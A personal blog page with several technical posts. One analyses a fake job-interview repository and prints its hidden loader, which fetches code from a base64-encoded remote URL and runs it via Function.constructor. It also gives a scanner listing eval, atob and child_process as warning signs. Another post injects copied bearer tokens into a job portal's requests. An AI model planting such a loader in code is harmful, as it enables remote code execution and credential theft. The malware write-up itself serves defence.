Monday, October 27, 2025

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for

TL;DR: Microsoft's job portal had a bug that prevented me from submitting my application. After some browser console detective work, I discovered missing bearer tokens, set strategic JavaScript breakpoints, and manually set authentication headers to get my resume through. The irony of debugging Microsoft's code to apply to Microsoft was not lost on me.

I was excited to apply for a position at Microsoft. Their job portal has a nice feature: you can import your resume directly from LinkedIn rather than uploading a PDF. Convenient, right? I clicked the import button, watched my information populate, and confidently hit "Upload."

And waited. And waited.

Nothing happened. The button was stuck in a loading state, spinning endlessly.

As any developer would do when faced with a broken web app, I opened the browser's Network tab. There it was: a request to gcsservices.careers.microsoft.com that was failing. I examined the request headers and immediately spotted the problem: Authorization: Bearer undefined

Ah yes, the classic "undefined" bearer token. Someone's authentication flow was broken. The frontend was trying to make an authenticated request, but the token wasn't being set properly.

I started looking through other requests in the Network tab and found several that did have valid bearer tokens. I copied one of these working tokens for later use. Now I needed to figure out where in the code this broken request was being made.

I searched through the loaded JavaScript files and found the culprit in a minified file called main.0805accee680294efbb3.js. The code looked like this:

e && e.headers && (e.headers.Authorization = "Bearer " + await (0, r.gf)(),
e.headers["X-CorrelationId"] = i.$.telemetry.sessionId,
e.headers["X-SubCorrelationId"] = (0, s.A)(),
t(e))

This is where the bearer token was supposed to be added to the request headers. The r.gf function was clearly supposed to retrieve the token, but it was returning undefined.

I set a breakpoint on this line using Chrome DevTools. When the breakpoint hit, I manually set the bearer token in the console:

e.headers.Authorization = "Bearer " + "[my-valid-token]"

Then I let the execution continue. Success! The resume uploaded. Victory, right? Not quite.

After uploading the resume, I tried to click "Save and continue" to move to the next step. More failed requests.

Back to the Network tab. This time, I noticed requests failing to a different domain: careers.microsoft.com (without the "gcsservices" subdomain). These requests also had bearer token issues, but here's the twist: they needed a different bearer token than the first set of requests. Microsoft's job portal was apparently using two separate authentication systems.

I searched through the JavaScript again and found where XMLHttpRequest headers were being set:

const o = Ee.from(r.headers).normalize();

This was in a different part of the codebase handling a different set of API calls. I set another breakpoint here. Now I had a two-token juggling act: when requests went to gcsservices.careers.microsoft.com, I set Token A, and when requests went to careers.microsoft.com, I set Token B.

With both breakpoints set and both tokens ready, I went through the application flow one more time, pausing at each breakpoint to inject the appropriate token: Token A for gcsservices requests, Token B for careers.microsoft.com requests. It finally worked, and I made it through to the next page.
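
In retrospect, Chrome's conditional breakpoints could have saved some of the clicking. A breakpoint condition is just a JavaScript expression evaluated when the line is reached, so the same assignments I was typing by hand can live in a condition that patches the header and then evaluates to false, never actually pausing. Roughly (the variable names are the ones from the minified code above; the token values are whatever you copied from working requests):

// Condition for a breakpoint at the t(e) call in main.0805accee680294efbb3.js
// (gcsservices.careers.microsoft.com requests): patch the header, never pause.
(e.headers.Authorization = "Bearer " + "[token A]", false)

// Condition for the breakpoint at the Ee.from(r.headers) line
// (careers.microsoft.com requests): same trick with the other token.
(r.headers.Authorization = "Bearer " + "[token B]", false)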


There's something deliciously ironic about having to debug Microsoft's production code just to submit a job application to Microsoft. Oh, and did I mention? I was doing all of this on a Chromebook Flex. 😄

This reminded me of last year when I wanted to buy a book from an online store. Their checkout form was broken and wouldn't let me proceed to payment. So I opened the browser console, found the validation bug in their JavaScript, bypassed it, and successfully placed my order. Apparently, fixing broken web forms has become my unexpected superpower.

To the Microsoft Hiring Team

If you're reading this:

  • Can I haz job?

Did I need to spend an hour debugging a job application portal? No. Was it more interesting than just uploading a PDF? Absolutely. And hey, if nothing else, I got a good blog post out of it.

Have you ever had to debug something just to accomplish a simple task? Share your stories in the comments!

Friday, October 17, 2025

Almost exploited via a job interview assignment

A few days ago, someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted to move me forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. Complete a 45-minute take-home coding assessment, push results to a public repository, share the link. Two business days. Standard tech interview stuff.

BitBucket and VMs

Andrew sent a BitBucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the BitBucket link; probably not great opsec, but I do use BitBucket. Instead of cloning to my local machine, though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (well, it is something crypto-related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie handling code, I found something concerning.

The code fetched data from a remote URL (base64 encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function.constructor to execute whatever code the remote server returned.

// "errorHandler" doesn't handle errors at all: it compiles the string it
// receives into a function via Function.constructor and runs it with
// full access to require().
const errorHandler = (error) => {
    const createHandler = (errCode) => {
        const handler = new (Function.constructor)('require', errCode);
        return handler;
    };
    const handlerFunc = createHandler(error);
    handlerFunc(require);
}

// COOKIE_URL is base64-encoded; whatever the remote server returns in
// res.data.cookie is executed on the machine running the backend.
axios.get(atob(COOKIE_URL)).then(
    res => errorHandler(res.data.cookie)
);

Had I started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server: environment variables, API keys, credentials, and sensitive files exfiltrated; backdoors installed.
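
For anyone who hasn't run into this pattern before, here's a harmless illustration of what that "error handler" boils down to (the payload string here is made up; a real attacker serves something far worse):

// The remote server returns a string of JavaScript...
const payload = "const os = require('os'); console.log('running on', os.hostname());";

// ...and Function.constructor turns it into a function that receives `require`,
// handing the remote code Node's full module system (fs, child_process, ...).
const handler = new (Function.constructor)('require', payload);
handler(require);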

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on BitBucket, a trusted platform. Actual working React code with a malicious payload hidden in the middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't scrutinize carefully. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flag was in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. Not just phishing emails anymore; fully functional applications with malicious code carefully hidden where it might go unnoticed. Hosted on legitimate platforms like BitBucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.
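
None of this requires fancy tooling, either. Before running anything from a take-home, a quick grep-style pass for the usual tricks goes a long way. Here's a minimal sketch of the kind of scan I mean (the pattern list is deliberately short, and the script is just an illustration, not a real malware scanner):

// scan.js - walk a cloned repo and flag suspicious patterns before `npm install`.
const fs = require('fs');
const path = require('path');

const SUSPICIOUS = [
    /Function\.constructor/,  // dynamic code execution
    /new Function\(/,         // same trick, spelled differently
    /\beval\(/,               // the classic
    /atob\(/,                 // base64-decoded URLs or payloads
    /child_process/,          // spawning shells
];

function walk(dir) {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
        const full = path.join(dir, entry.name);
        if (entry.isDirectory()) {
            if (entry.name !== 'node_modules' && entry.name !== '.git') walk(full);
        } else if (/\.(js|jsx|ts|tsx|json)$/.test(entry.name)) {
            const text = fs.readFileSync(full, 'utf8');
            for (const pattern of SUSPICIOUS) {
                if (pattern.test(text)) console.log(`${full}: matches ${pattern}`);
            }
        }
    }
}

walk(process.argv[2] || '.');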

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.

This philosophy is portable. I have a Chromebook that I leave at my in-laws', perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VS Code. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VS Code experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches for a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VS Code window was connected to a powerful machine running the develop branch, and a second VS Code window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can transform containers between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily that I'm hitting weekly limits. The experience has been fascinating: AI is surprisingly good at some tasks but still needs a human for architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

the transpiler needs to understand those apt-get commands deeply enough to transform them into:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.

Monday, September 29, 2025

Building a Claude Code Plugin for NetBeans: An Early Look

I've started working on a personal project to integrate Claude Code directly into the NetBeans IDE. It's still in the early stages, but there's enough progress to share a look at how it's taking shape.

As someone who contributed to NetBeans in the past (starting back in the Sun Microsystems days, through the early Apache Software Foundation years, and with my old OpenBeans distribution), it's interesting to be tinkering with the platform again in this new context of AI-assisted development.

Current Progress

The basic integration is working. The plugin can now:

  • Respond to most tool calls
  • Track and send your current code selection, updating Claude when you change it

This provides the foundation for contextual conversations about your code. Most of the core MCP (Model Context Protocol) tools are implemented, allowing Claude to interact meaningfully with the project workspace.

Interestingly, I'm building much of this with Claude Code itself. While I handle the architecture and inevitably fix things when they go off track, it's been a practical test of using the tool to build its own integration.

Current Focus: Refining the Integration

Right now, I'm focused on the finer details of the MCP protocol implementation. The public documentation covers the concepts well, but getting all the JSON schemas precisely right for a robust integration requires some careful attention.

What makes this particularly interesting is that, unlike many modern protocols, Claude Code's MCP flavour isn't fully open, and neither are the official plugins for editors like VS Code and IntelliJ.

To help with development, I created a WebSocket proxy library—ironically, with Claude's help—which has been useful for observing the data flow and debugging the communication layer.
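
Conceptually, the proxy is just a relay that sits between the two ends of the connection and logs every frame that passes through. A bare-bones sketch of the idea using the ws package (the port, upstream URL, and log labels are placeholders; the actual library handles reconnection and other details):

// A logging relay: the plugin connects here, and every message is
// forwarded to the real endpoint (and back), printed along the way.
const { WebSocketServer, WebSocket } = require('ws');

const LISTEN_PORT = 9999;                     // where the plugin connects (placeholder)
const UPSTREAM_URL = 'ws://localhost:12345';  // the real endpoint (placeholder)

const server = new WebSocketServer({ port: LISTEN_PORT });

server.on('connection', (client) => {
    const upstream = new WebSocket(UPSTREAM_URL);
    const pending = [];

    client.on('message', (data) => {
        console.log('ide -> claude:', data.toString());
        if (upstream.readyState === WebSocket.OPEN) upstream.send(data);
        else pending.push(data);  // hold frames until the upstream socket opens
    });
    upstream.on('open', () => pending.forEach((frame) => upstream.send(frame)));

    upstream.on('message', (data) => {
        console.log('claude -> ide:', data.toString());
        client.send(data);
    });

    client.on('close', () => upstream.close());
    upstream.on('close', () => client.close());
});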

Looking Ahead

This remains a side project, driven by personal interest in both NetBeans and AI tooling. The goal for now is to create a solid, functional plugin that I'd be comfortable using.

If you're a NetBeans user curious about AI-assisted coding, I'd be interested in your thoughts. What would make a tool like this most useful in your workflow? I'm continuing development and will share updates as there's more to show.

If you're curious about the code or want to follow along, the project is on GitHub.

Friday, September 26, 2025

Scaling AI Workloads: Using Linux FS-Cache to Serve Giant Models from Network Storage

Working with multi-gigabyte LLM and diffusion model files presents a practical challenge: local storage is fast but limited, while network storage is capacious but slow. This is especially true for compact workstations like a Mac Mini or a laptop with a small SSD, where fitting several large models is impossible.

What if you could get the best of both worlds—the speed of local storage for active models and the limitless capacity of a network share? Instead of copying files back and forth, we can use a transparent caching layer built right into the Linux kernel.

The Bottleneck: Network Latency vs. Model Size

The standard approach of mounting a network drive (NFS or Samba/CIFS) containing your model repository solves the storage problem but introduces a performance penalty. Loading a 10GB model over a network, even a fast one, can cause significant delays. This slows down experimentation, hinders rapid model switching, and creates a frustrating development cycle.

The solution isn't to fight the network but to smartly use local storage as a massive read-cache for the remote filesystem. Enter FS-Cache.

FS-Cache: The Hidden Gem for Accelerating Network Filesystems

Linux has long included a powerful, filesystem-agnostic caching layer called FS-Cache. Originally designed for environments like NFS, its utility for AI workloads is profound. The concept is simple:

  1. The first time a model file is read from the network, it is silently stored in a designated cache on a local disk (ideally an SSD).
  2. Every subsequent read for that file is served directly from the local cache at drive speeds, bypassing the network entirely.

This means the second time you load "llama2-7b.Q4.gguf," it feels instantaneous.

Implementation: A Two-Step Setup

The beauty of this system is that it requires no changes to your applications. PyTorch, TensorFlow, or any other tool that reads files will transparently benefit.

Step 1: Configure the cachefilesd Daemon

The kernel provides the caching engine, but you need a userspace manager for the cache directory. This is handled by cachefilesd.

  1. Install it: sudo apt install cachefilesd (on Debian/Ubuntu).
  2. Edit /etc/cachefilesd.conf to point dir to a directory on your fast local drive (e.g., dir /var/cache/fscache). Ensure it has enough space for your active set of models.
  3. Start and enable the daemon: sudo systemctl enable --now cachefilesd.

Step 2: Mount the Network Share with the fsc Flag

Now, mount your network share containing the models with the special fsc (filesystem cache) option.

For a CIFS/Samba share:

sudo mount -t cifs //ai-server/models /mnt/models -o username=user,password=pass,fsc

For an NFS share:

sudo mount -t nfs ai-server:/models /mnt/models -o fsc

That's it. Any file read from /mnt/models is now eligible for caching.

Pro Tip: Pre-Warming the Cache for Instant Results

While the cache populates naturally during use, you can pre-load specific models to eliminate the first-load penalty entirely. This is perfect for preparing a model before a demo or a critical training run.

Simply read the file through the mount point:

cat /mnt/models/llama2-7b.Q4.gguf > /dev/null

This command will pull the entire model file through the kernel's FS-Cache layer, populating the local disk cache. The next time your Python script opens that file, it will be read from the local SSD at full speed.

Conclusion

Using FS-Cache transforms your workflow. It allows a small, fast local disk to act as a high-speed front-end to a vast, centralized model repository on a network server. This isn't just for the classic NFS caching use cases; it's a pragmatic and powerful solution for managing the growing size of AI artifacts, making it easier to scale your development environment without upgrading every machine's storage.

Tuesday, June 14, 2022

The Trouble with Harry time loop

I saw The Trouble with Harry (1955) a while back and it didn't make a big impression on me. But recently I rewatched it and was struck by how oddly time seems to flow and how vaguely confused people are, as if they have memory problems.

This review goes into detail about the movie, but I wanted to focus on a single riddle. It's this exchange with the kid:

Arnie: Why haven't you visited before?
Sam: Perhaps I'll come back tomorrow
Arnie: When's that?
Sam: Day after today.
Arnie: That's yesterday, today is tomorrow.
Sam: It was.
Arnie: When was tomorrow yesterday, Mr. Marlowe?
Sam: Today.
Arnie: Oh, sure. Yesterday.

Arnie seems to be the only one who remembers reliving days. The adults just show slight confusion at times: forgetting things or having an unexplained familiarity with each other.

We learn from this exchange that the loop is not identical (Sam never visited before). But time does not flow properly, since Arnie has learned not to expect that tomorrow will simply arrive the next day ("When's that?").

Actually, Arnie knows that the day after the present day is... "yesterday": the loop restarts. If anything, the present day is something entirely new to Arnie. It's finally a "tomorrow".

My impression is that until now the loop contained a single day, "yesterday" on repeat, and the present day is finally a "tomorrow".

Sam and Arnie obviously talk about things from different perspectives. Maybe Sam has a slight intuition about things (being an artist), but only Arnie knows about the loop. So it's not clear what Sam means when he says "It was".

Anyway, this puzzles Arnie, who asks, "When was tomorrow yesterday, Mr. Marlowe?"

Now, Sam answers "Today". This may just be a reference to the conversation they've had: Arnie said that the day after today is yesterday, so today is the day when yesterday comes tomorrow.

But then Arnie thinks about the question he just asked and finds his own answer: in the previous loop of yesterdays, tomorrow was always yesterday.

It almost looks like the timeline was: Yesterday 1, Yesterday 2, ..., Yesterday N, Today (brand new).

Based on the ending, we know the adults intentionally set up another loop: they leave Harry in the forest for Arnie to find again. The mother even says, "Go on, Arnie, run home and tell me about it", and Miss Ivy Gravely repeats, "Please Arnie, run home and tell your mother".

So, the timeline is: Yesterday 1, Yesterday 2, ..., Yesterday N, Today 1, Today 2 (new loop).

It does not look to me that time is going in reverse. It looks to me like there's a daily loop that doesn't progress until things are settled.

Going back to the missing piece: Sam says "It was", suggesting that today was tomorrow. Assuming this is the first day of the new loop, that does make sense: today was yesterday's tomorrow, but since they are entering another loop there will not be another new day, just today on repeat.

The riddle is interesting because there's no language to express time loops properly. "Tomorrow" may mean the day following the present day (which may be a re-run of the loop), or it may mean the day that naturally follows current events. A more proper (but dry) phrasing would be:

Arnie: Why haven't you visited in any of the (repeated) days I remember?
Sam: Perhaps I'll come back tomorrow.
Arnie: When will we get to live tomorrow?
Sam: Day after today.
Arnie: After today we will relive yesterday, today is a new day following the yesterday loop.
Sam: But the next day won't be new.
Arnie: When did we live the day before yesterday, Mr. Marlowe?
Sam: [Nonsensical response.]
Arnie: [Gets confused.] Oh, sure. We continuously relived yesterday.
